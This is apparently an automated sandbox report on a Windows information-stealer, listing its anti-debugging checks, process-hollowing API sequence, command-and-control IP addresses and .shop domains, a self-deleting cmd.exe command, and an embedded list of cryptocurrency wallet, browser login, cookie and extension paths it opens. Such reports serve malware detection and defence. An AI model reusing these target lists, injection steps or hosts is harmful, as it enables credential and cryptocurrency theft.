Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: JEBKEH.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: 21AE.exe, 00000005.00000002.2691719782.00000000007E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpn
Source: JEBKEH.13.dr Binary or memory string: discord.comVMware20,11696428655f
Source: JEBKEH.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW+<
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: JEBKEH.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: JEBKEH.13.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: JEBKEH.13.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: JEBKEH.13.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: JEBKEH.13.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: JEBKEH.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: JEBKEH.13.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: JEBKEH.13.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: JEBKEH.13.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: JEBKEH.13.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: JEBKEH.13.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: JEBKEH.13.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\aarhevh System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\aarhevh Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007C32E7 rdtsc 5_2_007C32E7
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00402A9F LdrLoadDll, 0_2_00402A9F
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_6CACAC62
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007BE06B push dword ptr fs:[00000030h] 5_2_007BE06B
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0214092B mov eax, dword ptr fs:[00000030h] 5_2_0214092B
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_02140D90 mov eax, dword ptr fs:[00000030h] 5_2_02140D90

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exe File created: C9A7.exe.2.dr
Source: C:\Windows\explorer.exe Network Connect: 187.143.58.5 80
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
Source: C:\Windows\explorer.exe Network Connect: 186.112.12.192 80
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory allocated: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 12_2_042DA4F0
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Thread created: C:\Windows\explorer.exe EIP: 33219E0
Source: C:\Users\user\AppData\Roaming\aarhevh Thread created: unknown EIP: 31919E0
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 value starts with: 4D5A
Source: 21AE.exe String found in binary or memory: zippyfinickysofwps.shop
Source: 21AE.exe String found in binary or memory: obsceneclassyjuwks.shop
Source: 21AE.exe String found in binary or memory: acceptabledcooeprs.shop
Source: 21AE.exe String found in binary or memory: whispedwoodmoodsksl.shop
Source: 21AE.exe String found in binary or memory: boredimperissvieos.shop
Source: 21AE.exe String found in binary or memory: holicisticscrarws.shop
Source: 21AE.exe String found in binary or memory: sweetsquarediaslw.shop
Source: 21AE.exe String found in binary or memory: plaintediousidowsko.shop
Source: 21AE.exe String found in binary or memory: miniaturefinerninewjs.shop
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\aarhevh Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\aarhevh Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section unmapped: C:\Users\user\AppData\Local\Temp\katA304.tmp base address: 400000
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 401000
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 422000
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 42E000
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Memory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 641000
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CB14760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 13_2_6CB14760
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 13_2_6C9F1C30
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2037854889.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2036595437.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACAE71 cpuid 13_2_6CACAE71
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CACA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 13_2_6CACA8DC
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CA18390 NSS_GetVersion, 13_2_6CA18390
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 21AE.exe, 00000005.00000002.2691748524.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.000000000081F000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\21AE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000818000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: \\config\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
